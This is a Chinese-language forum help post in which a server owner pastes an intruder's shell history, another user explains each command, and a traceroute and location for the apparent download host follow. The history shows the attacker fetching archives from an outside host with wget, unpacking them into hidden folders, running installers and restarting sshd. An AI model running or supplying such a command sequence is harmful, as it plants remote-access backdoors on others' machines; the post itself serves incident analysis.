救命啊!!! 我被駭客入侵,請問他是想作什麼嗎?
他的指令如下
964 wget ciorexu.webs.com/s.tgz
965 tar xzvf s.tgz
966 rm -rf s.tgz
967 cd .s
968 ./inst
969 cd ..
970 wget ciorexu.webs.com/b.tgz
971 tar xzvf b.tgz
972 rm -rf b.tgz
973 cd .b
974 ls -a
975 ./inst
976 service sshd restart
965 tar xzvf s.tgz => 解壓縮
966 rm -rf s.tgz => 刪除 s.tgz 檔
967 cd .s => .s(是一個隱藏資料夾), 進入這個資料夾
968 ./inst => 執行 inst 這個檔案
969 cd .. => 跳出
970 wget ciorexu.webs.com/b.tgz
971 tar xzvf b.tgz
972 rm -rf b.tgz
973 cd .b
974 ls -a
975 ./inst
976 service sshd restart => 重新啟動 sshd 服務,
sshd 主要是可以遠端控制對方的電腦...所以你被駭了
to 66.195.148.66 (66.195.148.66), 30 hops max, 40 byte packets
1 * * *
3 tpdt-3308.hinet.net (168.95.229.10) 34.983 ms 36.184 ms 37.685 ms
4 TPDT-3012.hinet.net (220.128.2.70) 40.181 ms 44.426 ms 45.060 ms
5 r4101-s2.tp.hinet.net (220.128.7.193) 42.598 ms 43.775 ms 45.048 ms
6 r4001-s2.tp.hinet.net (220.128.6.77) 46.261 ms 29.745 ms 30.089 ms
7 r11-pa.us.hinet.net (211.72.108.197) 159.413 ms 159.435 ms 160.094 ms
8 r01-la.us.hinet.net (202.39.83.229) 171.945 ms 170.619 ms 170.916 ms
9 eqx.10ge.lax.bboi.net (206.223.123.59) 174.790 ms 174.262 ms 174.837 ms
10 66.186.192.61 (66.186.192.61) 173.473 ms 173.672 ms 171.518 ms
11 phx-ten2-1-la-ten3-3.bboi.net (64.127.128.146) 180.140 ms 234.755 ms 235.549 ms
12 dal-ten2-4-phx-ten1-1.bboi.net (64.127.128.237) 259.975 ms 247.209 ms 247.656 ms
13 nsh-ten1-4-dal-ten2-1.bboi.net (64.127.130.49) 260.427 ms 256.076 ms 257.055 ms
14 64.127.129.142 (64.127.129.142) 266.334 ms 265.708 ms 267.018 ms
15 10ge9-1.newsw1.core.fuse.net (216.68.6.234) 255.218 ms 247.512 ms 305.037 ms
16 10ge8-4.sw2.core.fuse.net (216.68.7.232) 304.470 ms 320.668 ms 321.065 ms
17 edge5-g1-1.dist.fuse.net (216.68.7.54) 321.192 ms 306.640 ms 307.486 ms
18 fuse-dedicated-69-61-207-122.fuse.net (69.61.207.122) 310.425 ms 357.262 ms 357.824 ms
19 66-195-148-66.static.twtelecom.net (66.195.148.66) 358.482 ms 357.862 ms 356.937 ms
The server IP Address is 66.195.148.66 and 66.195.148.66 resides on Triplefin LLC in Cincinnati, OH, United States.




























































































